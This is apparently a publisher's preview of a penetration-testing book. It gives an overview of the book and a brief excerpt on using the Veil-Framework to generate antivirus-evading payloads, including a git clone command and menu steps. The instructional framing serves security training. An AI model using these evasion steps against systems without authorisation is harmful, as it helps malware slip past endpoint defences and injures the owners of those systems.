Book Image

Advanced Infrastructure Penetration Testing

Book Image

Advanced Infrastructure Penetration Testing

Overview of this book

It has always been difficult to gain hands-on experience and a comprehensive understanding of advanced penetration testing techniques and vulnerability assessment and management. This book will be your one-stop solution to compromising complex network devices and modern operating systems. This book provides you with advanced penetration testing techniques that will help you exploit databases, web and application servers, switches or routers, Docker, VLAN, VoIP, and VPN. With this book, you will explore exploitation abilities such as offensive PowerShell tools and techniques, CI servers, database exploitation, Active Directory delegation, kernel exploits, cron jobs, VLAN hopping, and Docker breakouts. Moving on, this book will not only walk you through managing vulnerabilities, but will also teach you how to ensure endpoint protection. Toward the end of this book, you will also discover post-exploitation tips, tools, and methodologies to help your organization build an intelligent security system. By the end of this book, you will have mastered the skills and methodologies needed to breach infrastructures and provide complete endpoint protection for your system.
Table of Contents (14 chapters)

Bypassing antivirus with the Veil-Framework

As a penetration tester, always remember that you are simulating real-world attacks, and in the real world, hackers are trying to bypass antivirus protection using many techniques. The Veil-Framework is a fantastic tool for avoiding payload detection. To install Veil 3.0, you need to download it from its official GitHub source at https://github.com/Veil-Framework/Veil:

# git clone https://github.com/Veil-Framework/Veil

Now you just need to select a task from an assisted main menu:

To generate a payload, select list, and type use 1:

To list all the available payloads, use list as usual:

Select your payload using the use command:

Enter generate to create the payload:

Complete the options, and you will generate an undetectable payload, as simple as that:

You can also do an Nmap scan using Metasploit, exporting the results and importing...